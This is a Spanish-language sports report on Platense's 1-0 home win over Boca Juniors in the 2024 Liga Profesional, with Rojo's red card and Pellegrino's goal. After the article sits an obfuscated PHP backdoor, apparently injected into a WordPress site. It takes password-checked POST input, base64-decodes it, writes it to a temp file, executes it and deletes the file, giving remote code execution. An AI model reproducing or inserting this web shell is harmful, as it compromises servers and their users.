Triunfazo de Platense, en una destacada producción, ante Boca Juniors

Platense derrotó a Boca Juniors 1-0, en el estadio Ciudad de Vicente López, por la cuarta fecha del Torneo 2024 de la Liga Profesional. El Calamar, con un destacado funcionamiento, fue superior a un flojo Xeneixe y celebró con el gol de Mateo Pellegrino y festejó su primer triunfo del certamen.

Desde el inicio hubo fricciones y algunas piernas, y manos, soltando más vehemencia que la necesaria. Como Marcos Rojo, un consumidor habitual de tarjetas, que fue amonestado por una fuerte falta, de atrás, a Mateo Pellegrino cuando apenas habían pasado 4 minutos. Y a los 35, el defensor de Boca le tiró un codazo en la cara a Lucas Juárez y vio la tarjeta roja.

En medio de la primera y segunda amonestación, Rojo tuvo otra acción desafortunada. Le cometió una infracción dentro del área a Gastón Suso, pero ni el árbitro Nicolás Ramírez ni el VAR advirtieron el penal. Tampoco vieron, el referí y el VAR, un codazo de Kevin Zenón a Ignacio Vázquez, que era merecedor de expulsión.

En ese primer tiempo parejo y caliente, hubo, al comienzo, una chance clara para cada uno. Juan Pablo Cozzani se lució ante un remate de Ezequiel Fernández y Sergio Chiquito Romero, a puro reflejo con su pie derecho, le tapó el cabezazo a Pellegrino.

La gran diferencia se dio en el segundo tiempo. Se jugó al ritmo de Platense, que presionó, atacó y manejó el juego. Defendió acertadamente, dispuso del medio y fue punzante arriba. Boca -no estuvo Edinson Cavani, por una lesión en un tobillo- no reaccionaba y Chiquito Romero era su respaldo, el único, para mantenerse vivo.

Un centro desde la izquierda del ingresado Luis Angulo fue cabeceado, en el área, por Agustín Ocampo y Sergio Romero respondió con una espectacular tapada; Pellegrino, atento a la continuidad de la jugada, empujó la pelota hacia el delirio de Platense, a los 22 minutos.

Envalentonado con este gol, el Calamar fue por más. No se conformó, por el contrario insistió en su búsqueda y siguió dándole trabajo a Chiquito Romero. Entre las atajadas destacadas del ex arquero de la Selección resaltó una a de Ronaldo Martínez.

El equipo de Diego Martínez tuvo su única situación neta en tiempo de descuento. Y pudo haber significado el (inmerecido) empate, pero Norberto Briasco no resolvió bien en el mano a mano con Cozzani.

La camiseta estrenada esta tarde por Platense -la tercera de la serie El Origen, que remite a la historia y a la casaca utilizada por los entusiastas primeros futbolistas de la entidad- resultó ganadora.

Además acompañó una marca: un triunfo ante Boca Juniors después de 26 años. Aquella vez, el 22 de febrero de 1998, por la segunda fecha del Torneo Clausura, el Calamar goleó 4-0, con tantos de Maurico Hanuch (2), Alberto Godoy y Claudio Spontón, en el estadio de Boca.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}